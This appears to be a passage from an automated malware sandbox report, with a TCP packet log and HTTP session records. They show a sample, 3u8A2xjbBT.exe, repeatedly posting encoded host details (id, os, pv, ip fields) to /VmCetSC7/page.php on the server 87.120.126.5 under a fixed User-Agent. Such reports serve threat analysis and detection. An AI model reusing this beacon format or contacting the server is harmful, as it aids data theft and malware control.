                                    Oct 30, 2024 12:24:20.213121891 CET804998387.120.126.5192.168.2.7
                                    Oct 30, 2024 12:24:20.213309050 CET4998380192.168.2.787.120.126.5
                                    Oct 30, 2024 12:24:20.213377953 CET4998380192.168.2.787.120.126.5
                                    Oct 30, 2024 12:24:20.213553905 CET804998087.120.126.5192.168.2.7
                                    Oct 30, 2024 12:24:20.213660002 CET4998080192.168.2.787.120.126.5
                                    Oct 30, 2024 12:24:20.218732119 CET804998387.120.126.5192.168.2.7
                                    Oct 30, 2024 12:24:20.567019939 CET4998380192.168.2.787.120.126.5
                                    Oct 30, 2024 12:24:20.572549105 CET804998387.120.126.5192.168.2.7
                                    Oct 30, 2024 12:24:21.023513079 CET804998387.120.126.5192.168.2.7
                                    Oct 30, 2024 12:24:21.045025110 CET804998387.120.126.5192.168.2.7
                                    Oct 30, 2024 12:24:21.045116901 CET4998380192.168.2.787.120.126.5
                                    Oct 30, 2024 12:24:25.488943100 CET4998480192.168.2.787.120.126.5
                                    Oct 30, 2024 12:24:25.494401932 CET804998487.120.126.5192.168.2.7
                                    Oct 30, 2024 12:24:25.494502068 CET4998480192.168.2.787.120.126.5
                                    Oct 30, 2024 12:24:25.494616985 CET4998480192.168.2.787.120.126.5
                                    Oct 30, 2024 12:24:25.499913931 CET804998487.120.126.5192.168.2.7
                                    Oct 30, 2024 12:24:25.847443104 CET4998480192.168.2.787.120.126.5
                                    Oct 30, 2024 12:24:25.852948904 CET804998487.120.126.5192.168.2.7
                                    Oct 30, 2024 12:24:26.306341887 CET804998487.120.126.5192.168.2.7
                                    Oct 30, 2024 12:24:26.317204952 CET804998487.120.126.5192.168.2.7
                                    Oct 30, 2024 12:24:26.317281961 CET4998480192.168.2.787.120.126.5
                                    Oct 30, 2024 12:24:28.956641912 CET4998380192.168.2.787.120.126.5
                                    Oct 30, 2024 12:24:28.957165956 CET4998580192.168.2.787.120.126.5
                                    Oct 30, 2024 12:24:28.962790012 CET804998587.120.126.5192.168.2.7
                                    Oct 30, 2024 12:24:28.962857008 CET804998387.120.126.5192.168.2.7
                                    Oct 30, 2024 12:24:28.965982914 CET4998380192.168.2.787.120.126.5
                                    Oct 30, 2024 12:24:28.966010094 CET4998580192.168.2.787.120.126.5
                                    Oct 30, 2024 12:24:28.970891953 CET4998580192.168.2.787.120.126.5
                                    Oct 30, 2024 12:24:28.976304054 CET804998587.120.126.5192.168.2.7
                                    Oct 30, 2024 12:24:29.322052002 CET4998580192.168.2.787.120.126.5
                                    Oct 30, 2024 12:24:29.332473993 CET804998587.120.126.5192.168.2.7
                                    Oct 30, 2024 12:24:29.787497044 CET804998587.120.126.5192.168.2.7
                                    Oct 30, 2024 12:24:29.796834946 CET804998587.120.126.5192.168.2.7
                                    Oct 30, 2024 12:24:29.796910048 CET4998580192.168.2.787.120.126.5
                                    Oct 30, 2024 12:24:41.316971064 CET4998480192.168.2.787.120.126.5
                                    Oct 30, 2024 12:24:41.316972017 CET4998680192.168.2.787.120.126.5
                                    Oct 30, 2024 12:24:41.322384119 CET804998687.120.126.5192.168.2.7
                                    Oct 30, 2024 12:24:41.322590113 CET4998680192.168.2.787.120.126.5
                                    Oct 30, 2024 12:24:41.322643995 CET804998487.120.126.5192.168.2.7
                                    Oct 30, 2024 12:24:41.322659016 CET4998680192.168.2.787.120.126.5
                                    Oct 30, 2024 12:24:41.322786093 CET4998480192.168.2.787.120.126.5
                                    Oct 30, 2024 12:24:41.327972889 CET804998687.120.126.5192.168.2.7
                                    Oct 30, 2024 12:24:41.675647974 CET4998680192.168.2.787.120.126.5
                                    Oct 30, 2024 12:24:41.681027889 CET804998687.120.126.5192.168.2.7
                                    Oct 30, 2024 12:24:42.128978014 CET804998687.120.126.5192.168.2.7
                                    Oct 30, 2024 12:24:42.146981955 CET804998687.120.126.5192.168.2.7
                                    Oct 30, 2024 12:24:42.147037029 CET4998680192.168.2.787.120.126.5
                                    Oct 30, 2024 12:24:54.366976023 CET804997687.120.126.5192.168.2.7
                                    Oct 30, 2024 12:24:54.367086887 CET4997680192.168.2.787.120.126.5
                                    Oct 30, 2024 12:24:56.051835060 CET4998580192.168.2.787.120.126.5
                                    Oct 30, 2024 12:24:56.052216053 CET4998780192.168.2.787.120.126.5
                                    Oct 30, 2024 12:24:56.057805061 CET804998587.120.126.5192.168.2.7
                                    Oct 30, 2024 12:24:56.057862997 CET4998580192.168.2.787.120.126.5
                                    Oct 30, 2024 12:24:56.058428049 CET804998787.120.126.5192.168.2.7
                                    Oct 30, 2024 12:24:56.058492899 CET4998780192.168.2.787.120.126.5
                                    Oct 30, 2024 12:24:56.058618069 CET4998780192.168.2.787.120.126.5
                                    Oct 30, 2024 12:24:56.064191103 CET804998787.120.126.5192.168.2.7
                                    Oct 30, 2024 12:24:56.410070896 CET4998780192.168.2.787.120.126.5
                                    Oct 30, 2024 12:24:56.415720940 CET804998787.120.126.5192.168.2.7
                                    Oct 30, 2024 12:24:57.055794954 CET804998787.120.126.5192.168.2.7
                                    Oct 30, 2024 12:24:57.055819035 CET804998787.120.126.5192.168.2.7
                                    Oct 30, 2024 12:24:57.056046963 CET4998780192.168.2.787.120.126.5
                                    Oct 30, 2024 12:24:57.056241989 CET804998787.120.126.5192.168.2.7
                                    Oct 30, 2024 12:24:57.056432962 CET4998780192.168.2.787.120.126.5
                                    Oct 30, 2024 12:24:57.348880053 CET4998680192.168.2.787.120.126.5
                                    Oct 30, 2024 12:24:57.348886013 CET4998880192.168.2.787.120.126.5
                                    Oct 30, 2024 12:24:57.354337931 CET804998887.120.126.5192.168.2.7
                                    Oct 30, 2024 12:24:57.354867935 CET804998687.120.126.5192.168.2.7
                                    Oct 30, 2024 12:24:57.355025053 CET4998880192.168.2.787.120.126.5
                                    Oct 30, 2024 12:24:57.355074883 CET4998680192.168.2.787.120.126.5
                                    Oct 30, 2024 12:24:57.355227947 CET4998880192.168.2.787.120.126.5
                                    Oct 30, 2024 12:24:57.361264944 CET804998887.120.126.5192.168.2.7
                                    Oct 30, 2024 12:24:57.707786083 CET4998880192.168.2.787.120.126.5
                                    Oct 30, 2024 12:24:57.713278055 CET804998887.120.126.5192.168.2.7
                                    Oct 30, 2024 12:24:58.211189985 CET804998887.120.126.5192.168.2.7
                                    Oct 30, 2024 12:24:58.222182989 CET804998887.120.126.5192.168.2.7
                                    Oct 30, 2024 12:24:58.222259998 CET4998880192.168.2.787.120.126.5
                                    Oct 30, 2024 12:25:09.756978035 CET4998780192.168.2.787.120.126.5
                                    Oct 30, 2024 12:25:09.757786036 CET4998980192.168.2.787.120.126.5
                                    Oct 30, 2024 12:25:09.763582945 CET804998787.120.126.5192.168.2.7
                                    Oct 30, 2024 12:25:09.763649940 CET4998780192.168.2.787.120.126.5
                                    Oct 30, 2024 12:25:09.763751984 CET804998987.120.126.5192.168.2.7
                                    Oct 30, 2024 12:25:09.763833046 CET4998980192.168.2.787.120.126.5
                                    Oct 30, 2024 12:25:09.764139891 CET4998980192.168.2.787.120.126.5
                                    Oct 30, 2024 12:25:09.769599915 CET804998987.120.126.5192.168.2.7
                                    Oct 30, 2024 12:25:10.098082066 CET4998880192.168.2.787.120.126.5
                                    Oct 30, 2024 12:25:10.098505974 CET4999080192.168.2.787.120.126.5
                                    Oct 30, 2024 12:25:10.103929996 CET804999087.120.126.5192.168.2.7
                                    Oct 30, 2024 12:25:10.104055882 CET4999080192.168.2.787.120.126.5
                                    Oct 30, 2024 12:25:10.104183912 CET804998887.120.126.5192.168.2.7
                                    Oct 30, 2024 12:25:10.104247093 CET4998880192.168.2.787.120.126.5
                                    Oct 30, 2024 12:25:10.104289055 CET4999080192.168.2.787.120.126.5
                                    Oct 30, 2024 12:25:10.109755039 CET804999087.120.126.5192.168.2.7
                                    Oct 30, 2024 12:25:10.113370895 CET4998980192.168.2.787.120.126.5
                                    Oct 30, 2024 12:25:10.119087934 CET804998987.120.126.5192.168.2.7
                                    Oct 30, 2024 12:25:10.457149982 CET4999080192.168.2.787.120.126.5
                                    Oct 30, 2024 12:25:10.462837934 CET804999087.120.126.5192.168.2.7
                                    Oct 30, 2024 12:25:10.590372086 CET804998987.120.126.5192.168.2.7
                                    Oct 30, 2024 12:25:10.614449978 CET804998987.120.126.5192.168.2.7
                                    Oct 30, 2024 12:25:10.614516973 CET4998980192.168.2.787.120.126.5
                                    Oct 30, 2024 12:25:10.952028990 CET804999087.120.126.5192.168.2.7
                                    Oct 30, 2024 12:25:10.961870909 CET804999087.120.126.5192.168.2.7
                                    Oct 30, 2024 12:25:10.962117910 CET4999080192.168.2.787.120.126.5
                                    Oct 30, 2024 12:25:17.254329920 CET4999080192.168.2.787.120.126.5
                                    Oct 30, 2024 12:25:17.254609108 CET4999180192.168.2.787.120.126.5
                                    Oct 30, 2024 12:25:17.260102034 CET804999187.120.126.5192.168.2.7
                                    Oct 30, 2024 12:25:17.260168076 CET804999087.120.126.5192.168.2.7
                                    Oct 30, 2024 12:25:17.260201931 CET4999180192.168.2.787.120.126.5
                                    Oct 30, 2024 12:25:17.260248899 CET4999080192.168.2.787.120.126.5
                                    Oct 30, 2024 12:25:17.260421991 CET4999180192.168.2.787.120.126.5
                                    Oct 30, 2024 12:25:17.265748978 CET804999187.120.126.5192.168.2.7
                                    Oct 30, 2024 12:25:17.613322020 CET4999180192.168.2.787.120.126.5
                                    Oct 30, 2024 12:25:17.618910074 CET804999187.120.126.5192.168.2.7
                                    Oct 30, 2024 12:25:18.083045959 CET804999187.120.126.5192.168.2.7
                                    Oct 30, 2024 12:25:18.093244076 CET804999187.120.126.5192.168.2.7
                                    Oct 30, 2024 12:25:18.093467951 CET4999180192.168.2.787.120.126.5
                                    Oct 30, 2024 12:25:19.488796949 CET4998980192.168.2.787.120.126.5
                                    Oct 30, 2024 12:25:19.489393950 CET4999280192.168.2.787.120.126.5
                                    Oct 30, 2024 12:25:19.494995117 CET804998987.120.126.5192.168.2.7
                                    Oct 30, 2024 12:25:19.495038986 CET804999287.120.126.5192.168.2.7
                                    Oct 30, 2024 12:25:19.495068073 CET4998980192.168.2.787.120.126.5
                                    Oct 30, 2024 12:25:19.495125055 CET4999280192.168.2.787.120.126.5
                                    Oct 30, 2024 12:25:19.495362997 CET4999280192.168.2.787.120.126.5
                                    Oct 30, 2024 12:25:19.500746965 CET804999287.120.126.5192.168.2.7
                                    Oct 30, 2024 12:25:19.847637892 CET4999280192.168.2.787.120.126.5
                                    Oct 30, 2024 12:25:19.853377104 CET804999287.120.126.5192.168.2.7
                                    Oct 30, 2024 12:25:20.318298101 CET804999287.120.126.5192.168.2.7
                                    Oct 30, 2024 12:25:20.331440926 CET804999287.120.126.5192.168.2.7
                                    Oct 30, 2024 12:25:20.331614017 CET4999280192.168.2.787.120.126.5
                                    Oct 30, 2024 12:25:30.715615034 CET804998187.120.126.5192.168.2.7
                                    Oct 30, 2024 12:25:30.715887070 CET4998180192.168.2.787.120.126.5
                                    Oct 30, 2024 12:25:33.163120985 CET4999180192.168.2.787.120.126.5
                                    Oct 30, 2024 12:25:33.169322014 CET804999187.120.126.5192.168.2.7
                                    Oct 30, 2024 12:25:33.169481993 CET4999180192.168.2.787.120.126.5
                                    Oct 30, 2024 12:25:33.170291901 CET4999380192.168.2.787.120.126.5
                                    Oct 30, 2024 12:25:33.175847054 CET804999387.120.126.5192.168.2.7
                                    Oct 30, 2024 12:25:33.176114082 CET4999380192.168.2.787.120.126.5
                                    Oct 30, 2024 12:25:33.176342964 CET4999380192.168.2.787.120.126.5
                                    Oct 30, 2024 12:25:33.181874037 CET804999387.120.126.5192.168.2.7
                                    Oct 30, 2024 12:25:33.535197973 CET4999380192.168.2.787.120.126.5
                                    Oct 30, 2024 12:25:33.540710926 CET804999387.120.126.5192.168.2.7
                                    Oct 30, 2024 12:25:33.999937057 CET804999387.120.126.5192.168.2.7
                                    Oct 30, 2024 12:25:34.013309956 CET804999387.120.126.5192.168.2.7
                                    Oct 30, 2024 12:25:34.013525963 CET4999380192.168.2.787.120.126.5
                                    Oct 30, 2024 12:25:36.676316023 CET4999280192.168.2.787.120.126.5
                                    Oct 30, 2024 12:25:36.676743984 CET4999480192.168.2.787.120.126.5
                                    Oct 30, 2024 12:25:36.682121038 CET804999287.120.126.5192.168.2.7
                                    Oct 30, 2024 12:25:36.682137966 CET804999487.120.126.5192.168.2.7
                                    Oct 30, 2024 12:25:36.682225943 CET4999480192.168.2.787.120.126.5
                                    Oct 30, 2024 12:25:36.682225943 CET4999280192.168.2.787.120.126.5
                                    Oct 30, 2024 12:25:36.682791948 CET4999480192.168.2.787.120.126.5
                                    Oct 30, 2024 12:25:36.688160896 CET804999487.120.126.5192.168.2.7
                                    Oct 30, 2024 12:25:37.035238028 CET4999480192.168.2.787.120.126.5
                                    Oct 30, 2024 12:25:37.040751934 CET804999487.120.126.5192.168.2.7
                                    Oct 30, 2024 12:25:37.531061888 CET804999487.120.126.5192.168.2.7
                                    Oct 30, 2024 12:25:37.546988964 CET804999487.120.126.5192.168.2.7
                                    Oct 30, 2024 12:25:37.547049046 CET4999480192.168.2.787.120.126.5
                                    Oct 30, 2024 12:25:47.832520962 CET4998180192.168.2.787.120.126.5
                                    Oct 30, 2024 12:25:47.838083982 CET804998187.120.126.5192.168.2.7
                                    Oct 30, 2024 12:25:48.801666021 CET4999580192.168.2.787.120.126.5
                                    Oct 30, 2024 12:25:48.968751907 CET804999587.120.126.5192.168.2.7
                                    Oct 30, 2024 12:25:48.968852043 CET4999580192.168.2.787.120.126.5
                                    Oct 30, 2024 12:25:48.968986034 CET4999580192.168.2.787.120.126.5
                                    Oct 30, 2024 12:25:48.977957964 CET804999587.120.126.5192.168.2.7
                                    Oct 30, 2024 12:25:49.316513062 CET4999580192.168.2.787.120.126.5
                                    Oct 30, 2024 12:25:49.353657007 CET804999587.120.126.5192.168.2.7
                                    Oct 30, 2024 12:25:49.817302942 CET804999587.120.126.5192.168.2.7
                                    Oct 30, 2024 12:25:49.828653097 CET804999587.120.126.5192.168.2.7
                                    Oct 30, 2024 12:25:49.828720093 CET4999580192.168.2.787.120.126.5
                                    Oct 30, 2024 12:25:53.067327023 CET4999680192.168.2.787.120.126.5
                                    Oct 30, 2024 12:25:53.067358017 CET4999380192.168.2.787.120.126.5
                                    Oct 30, 2024 12:25:53.072777033 CET804999687.120.126.5192.168.2.7
                                    Oct 30, 2024 12:25:53.073003054 CET4999680192.168.2.787.120.126.5
                                    Oct 30, 2024 12:25:53.073003054 CET4999680192.168.2.787.120.126.5
                                    Oct 30, 2024 12:25:53.073873043 CET804999387.120.126.5192.168.2.7
                                    Oct 30, 2024 12:25:53.074088097 CET4999380192.168.2.787.120.126.5
                                    Oct 30, 2024 12:25:53.078476906 CET804999687.120.126.5192.168.2.7
                                    Oct 30, 2024 12:25:53.113967896 CET4999480192.168.2.787.120.126.5
                                    Oct 30, 2024 12:25:53.114415884 CET4999780192.168.2.787.120.126.5
                                    Oct 30, 2024 12:25:53.120070934 CET804999487.120.126.5192.168.2.7
                                    Oct 30, 2024 12:25:53.120084047 CET804999787.120.126.5192.168.2.7
                                    Oct 30, 2024 12:25:53.120183945 CET4999780192.168.2.787.120.126.5
                                    Oct 30, 2024 12:25:53.120187998 CET4999480192.168.2.787.120.126.5
                                    Oct 30, 2024 12:25:53.120354891 CET4999780192.168.2.787.120.126.5
                                    Oct 30, 2024 12:25:53.125798941 CET804999787.120.126.5192.168.2.7
                                    Oct 30, 2024 12:25:53.426018953 CET4999680192.168.2.787.120.126.5
                                    Oct 30, 2024 12:25:53.431895971 CET804999687.120.126.5192.168.2.7
                                    Oct 30, 2024 12:25:53.473267078 CET4999780192.168.2.787.120.126.5
                                    Oct 30, 2024 12:25:53.478575945 CET804999787.120.126.5192.168.2.7
                                    Oct 30, 2024 12:25:53.884582996 CET804999687.120.126.5192.168.2.7
                                    Oct 30, 2024 12:25:53.892601967 CET804999687.120.126.5192.168.2.7
                                    Oct 30, 2024 12:25:53.892868996 CET4999680192.168.2.787.120.126.5
                                    Oct 30, 2024 12:25:53.953432083 CET804999787.120.126.5192.168.2.7
                                    Oct 30, 2024 12:25:53.960656881 CET804999787.120.126.5192.168.2.7
                                    Oct 30, 2024 12:25:53.961069107 CET4999780192.168.2.787.120.126.5
                                    Oct 30, 2024 12:26:00.248963118 CET4999780192.168.2.787.120.126.5
                                    Oct 30, 2024 12:26:00.255220890 CET804999787.120.126.5192.168.2.7
                                    Oct 30, 2024 12:26:00.255290985 CET4999780192.168.2.787.120.126.5
                                    Oct 30, 2024 12:26:00.265825033 CET4999880192.168.2.787.120.126.5
                                    Oct 30, 2024 12:26:00.271712065 CET804999887.120.126.5192.168.2.7
                                    Oct 30, 2024 12:26:00.271774054 CET4999880192.168.2.787.120.126.5
                                    Oct 30, 2024 12:26:00.272008896 CET4999880192.168.2.787.120.126.5
                                    Oct 30, 2024 12:26:00.277286053 CET804999887.120.126.5192.168.2.7
                                    Oct 30, 2024 12:26:00.633143902 CET4999880192.168.2.787.120.126.5
                                    Oct 30, 2024 12:26:00.640536070 CET804999887.120.126.5192.168.2.7
                                    Oct 30, 2024 12:26:01.089189053 CET804999887.120.126.5192.168.2.7
                                    Oct 30, 2024 12:26:01.097759008 CET804999887.120.126.5192.168.2.7
                                    Oct 30, 2024 12:26:01.097855091 CET4999880192.168.2.787.120.126.5
                                    Oct 30, 2024 12:26:13.801675081 CET4999680192.168.2.787.120.126.5
                                    Oct 30, 2024 12:26:13.801676035 CET4999980192.168.2.787.120.126.5
                                    Oct 30, 2024 12:26:13.807122946 CET804999987.120.126.5192.168.2.7
                                    Oct 30, 2024 12:26:13.807455063 CET804999687.120.126.5192.168.2.7
                                    Oct 30, 2024 12:26:13.807543039 CET4999680192.168.2.787.120.126.5
                                    Oct 30, 2024 12:26:13.807543993 CET4999980192.168.2.787.120.126.5
                                    Oct 30, 2024 12:26:13.807681084 CET4999980192.168.2.787.120.126.5
                                    Oct 30, 2024 12:26:13.812916040 CET804999987.120.126.5192.168.2.7
                                    Oct 30, 2024 12:26:14.160382986 CET4999980192.168.2.787.120.126.5
                                    Oct 30, 2024 12:26:14.165743113 CET804999987.120.126.5192.168.2.7
                                    Oct 30, 2024 12:26:14.634841919 CET804999987.120.126.5192.168.2.7
                                    Oct 30, 2024 12:26:14.651279926 CET804999987.120.126.5192.168.2.7
                                    Oct 30, 2024 12:26:14.651362896 CET4999980192.168.2.787.120.126.5
                                    Oct 30, 2024 12:26:18.238888025 CET4999880192.168.2.787.120.126.5
                                    Oct 30, 2024 12:26:18.239130974 CET5000080192.168.2.787.120.126.5
                                    Oct 30, 2024 12:26:18.244543076 CET804999887.120.126.5192.168.2.7
                                    Oct 30, 2024 12:26:18.244645119 CET4999880192.168.2.787.120.126.5
                                    Oct 30, 2024 12:26:18.244684935 CET805000087.120.126.5192.168.2.7
                                    Oct 30, 2024 12:26:18.244750977 CET5000080192.168.2.787.120.126.5
                                    Oct 30, 2024 12:26:18.244823933 CET5000080192.168.2.787.120.126.5
                                    Oct 30, 2024 12:26:18.250200033 CET805000087.120.126.5192.168.2.7
                                    Oct 30, 2024 12:26:18.597879887 CET5000080192.168.2.787.120.126.5
                                    Oct 30, 2024 12:26:18.606069088 CET805000087.120.126.5192.168.2.7
                                    Oct 30, 2024 12:26:19.077151060 CET805000087.120.126.5192.168.2.7
                                    Oct 30, 2024 12:26:19.087575912 CET805000087.120.126.5192.168.2.7
                                    Oct 30, 2024 12:26:19.087673903 CET5000080192.168.2.787.120.126.5

                                    HTTP Request Dependency Graph

                                    • 87.120.126.5

                                    HTTP Packets

                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    0192.168.2.74997587.120.126.5806464C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    TimestampBytes transferredDirectionData
                                    Oct 30, 2024 12:23:14.246436119 CET218OUTPOST /VmCetSC7/page.php HTTP/1.1
                                    User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3
                                    Content-Type: application/x-www-form-urlencoded
                                    Host: 87.120.126.5
                                    Content-Length: 471
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Oct 30, 2024 12:23:14.597901106 CET471OUTData Raw: 69 64 3d 48 30 2f 75 7e 50 71 51 61 36 51 48 77 71 69 58 4d 71 64 59 6a 55 36 48 55 62 46 79 4b 58 53 6a 47 44 4f 62 48 73 45 52 67 39 76 54 49 4e 5a 33 79 43 55 6b 49 76 72 32 4f 49 78 6d 6b 70 73 62 73 6e 4c 6b 4b 51 4f 48 58 39 7e 37 54 39 51
                                    Data Ascii: id=H0/u~PqQa6QHwqiXMqdYjU6HUbFyKXSjGDObHsERg9vTINZ3yCUkIvr2OIxmkpsbsnLkKQOHX9~7T9QoVVHFFw==&os=b1~Ya6floynEjDOLJ6CTODXfxVYKZF2MUTe17DY4MXs=&pv=1KOnabZQRXT0NvIAsOUE/xkQBei0WVrvEyYSrzN8nuI=&ip=hfs6J/pDbIS~Slpd4epYRoUQRaerWSHx6dZxfqc7YA7a34hhY4Mw
                                    Oct 30, 2024 12:23:15.064409018 CET25INHTTP/1.1 100 Continue
                                    Oct 30, 2024 12:23:15.081238031 CET175INHTTP/1.1 200 OK
                                    Server: nginx/1.22.1
                                    Date: Wed, 30 Oct 2024 11:23:14 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    Data Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    1192.168.2.74997687.120.126.5806464C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    TimestampBytes transferredDirectionData
                                    Oct 30, 2024 12:23:38.407999992 CET194OUTPOST /VmCetSC7/page.php HTTP/1.1
                                    User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3
                                    Content-Type: application/x-www-form-urlencoded
                                    Host: 87.120.126.5
                                    Content-Length: 471
                                    Expect: 100-continue
                                    Oct 30, 2024 12:23:38.754592896 CET471OUTData Raw: 69 64 3d 48 30 2f 75 7e 50 71 51 61 36 51 48 77 71 69 58 4d 71 64 59 6a 55 36 48 55 62 46 79 4b 58 53 6a 47 44 4f 62 48 73 45 52 67 39 76 54 49 4e 5a 33 79 43 55 6b 49 76 72 32 4f 49 78 6d 6b 70 73 62 73 6e 4c 6b 4b 51 4f 48 58 39 7e 37 54 39 51
                                    Data Ascii: id=H0/u~PqQa6QHwqiXMqdYjU6HUbFyKXSjGDObHsERg9vTINZ3yCUkIvr2OIxmkpsbsnLkKQOHX9~7T9QoVVHFFw==&os=b1~Ya6floynEjDOLJ6CTODXfxVYKZF2MUTe17DY4MXs=&pv=1KOnabZQRXT0NvIAsOUE/xkQBei0WVrvEyYSrzN8nuI=&ip=hfs6J/pDbIS~Slpd4epYRoUQRaerWSHx6dZxfqc7YA7a34hhY4Mw
                                    Oct 30, 2024 12:23:39.230674028 CET25INHTTP/1.1 100 Continue
                                    Oct 30, 2024 12:23:39.251087904 CET175INHTTP/1.1 200 OK
                                    Server: nginx/1.22.1
                                    Date: Wed, 30 Oct 2024 11:23:39 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    Data Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    2192.168.2.74997787.120.126.5802908C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    TimestampBytes transferredDirectionData
                                    Oct 30, 2024 12:23:53.679069042 CET218OUTPOST /VmCetSC7/page.php HTTP/1.1
                                    User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3
                                    Content-Type: application/x-www-form-urlencoded
                                    Host: 87.120.126.5
                                    Content-Length: 471
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Oct 30, 2024 12:23:54.035523891 CET471OUTData Raw: 69 64 3d 48 30 2f 75 7e 50 71 51 61 36 51 48 77 71 69 58 4d 71 64 59 6a 55 36 48 55 62 46 79 4b 58 53 6a 47 44 4f 62 48 73 45 52 67 39 76 54 49 4e 5a 33 79 43 55 6b 49 76 72 32 4f 49 78 6d 6b 70 73 62 73 6e 4c 6b 4b 51 4f 48 58 39 7e 37 54 39 51
                                    Data Ascii: id=H0/u~PqQa6QHwqiXMqdYjU6HUbFyKXSjGDObHsERg9vTINZ3yCUkIvr2OIxmkpsbsnLkKQOHX9~7T9QoVVHFFw==&os=b1~Ya6floynEjDOLJ6CTODXfxVYKZF2MUTe17DY4MXs=&pv=N1KssbFnXifLaSKNWKTH5P8C9zq64/P7HwIx8eom7Sk=&ip=hfs6J/pDbIS~Slpd4epYRoUQRaerWSHx6dZxfqc7YA7a34hhY4Mw
                                    Oct 30, 2024 12:23:54.500469923 CET25INHTTP/1.1 100 Continue
                                    Oct 30, 2024 12:23:54.521398067 CET175INHTTP/1.1 200 OK
                                    Server: nginx/1.22.1
                                    Date: Wed, 30 Oct 2024 11:23:54 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    Data Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    3192.168.2.74997887.120.126.5804704C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    TimestampBytes transferredDirectionData
                                    Oct 30, 2024 12:23:59.329658985 CET218OUTPOST /VmCetSC7/page.php HTTP/1.1
                                    User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3
                                    Content-Type: application/x-www-form-urlencoded
                                    Host: 87.120.126.5
                                    Content-Length: 471
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Oct 30, 2024 12:23:59.675539970 CET471OUTData Raw: 69 64 3d 48 30 2f 75 7e 50 71 51 61 36 51 48 77 71 69 58 4d 71 64 59 6a 55 36 48 55 62 46 79 4b 58 53 6a 47 44 4f 62 48 73 45 52 67 39 76 54 49 4e 5a 33 79 43 55 6b 49 76 72 32 4f 49 78 6d 6b 70 73 62 73 6e 4c 6b 4b 51 4f 48 58 39 7e 37 54 39 51
                                    Data Ascii: id=H0/u~PqQa6QHwqiXMqdYjU6HUbFyKXSjGDObHsERg9vTINZ3yCUkIvr2OIxmkpsbsnLkKQOHX9~7T9QoVVHFFw==&os=b1~Ya6floynEjDOLJ6CTODXfxVYKZF2MUTe17DY4MXs=&pv=N1KssbFnXifLaSKNWKTH5P8C9zq64/P7HwIx8eom7Sk=&ip=hfs6J/pDbIS~Slpd4epYRoUQRaerWSHx6dZxfqc7YA7a34hhY4Mw
                                    Oct 30, 2024 12:24:00.173748016 CET25INHTTP/1.1 100 Continue
                                    Oct 30, 2024 12:24:00.189933062 CET175INHTTP/1.1 200 OK
                                    Server: nginx/1.22.1
                                    Date: Wed, 30 Oct 2024 11:24:00 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    Data Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    4192.168.2.74997987.120.126.5806464C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    TimestampBytes transferredDirectionData
                                    Oct 30, 2024 12:24:02.654419899 CET218OUTPOST /VmCetSC7/page.php HTTP/1.1
                                    User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3
                                    Content-Type: application/x-www-form-urlencoded
                                    Host: 87.120.126.5
                                    Content-Length: 471
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Oct 30, 2024 12:24:03.014358997 CET471OUTData Raw: 69 64 3d 48 30 2f 75 7e 50 71 51 61 36 51 48 77 71 69 58 4d 71 64 59 6a 55 36 48 55 62 46 79 4b 58 53 6a 47 44 4f 62 48 73 45 52 67 39 76 54 49 4e 5a 33 79 43 55 6b 49 76 72 32 4f 49 78 6d 6b 70 73 62 73 6e 4c 6b 4b 51 4f 48 58 39 7e 37 54 39 51
                                    Data Ascii: id=H0/u~PqQa6QHwqiXMqdYjU6HUbFyKXSjGDObHsERg9vTINZ3yCUkIvr2OIxmkpsbsnLkKQOHX9~7T9QoVVHFFw==&os=b1~Ya6floynEjDOLJ6CTODXfxVYKZF2MUTe17DY4MXs=&pv=1KOnabZQRXT0NvIAsOUE/xkQBei0WVrvEyYSrzN8nuI=&ip=hfs6J/pDbIS~Slpd4epYRoUQRaerWSHx6dZxfqc7YA7a34hhY4Mw
                                    Oct 30, 2024 12:24:03.476713896 CET25INHTTP/1.1 100 Continue
                                    Oct 30, 2024 12:24:03.485270977 CET175INHTTP/1.1 200 OK
                                    Server: nginx/1.22.1
                                    Date: Wed, 30 Oct 2024 11:24:03 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    Data Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    5192.168.2.74998087.120.126.5806464C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    TimestampBytes transferredDirectionData
                                    Oct 30, 2024 12:24:09.354286909 CET218OUTPOST /VmCetSC7/page.php HTTP/1.1
                                    User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3
                                    Content-Type: application/x-www-form-urlencoded
                                    Host: 87.120.126.5
                                    Content-Length: 471
                                    Expect: 100-continue
                                    Connection: Keep-Alive
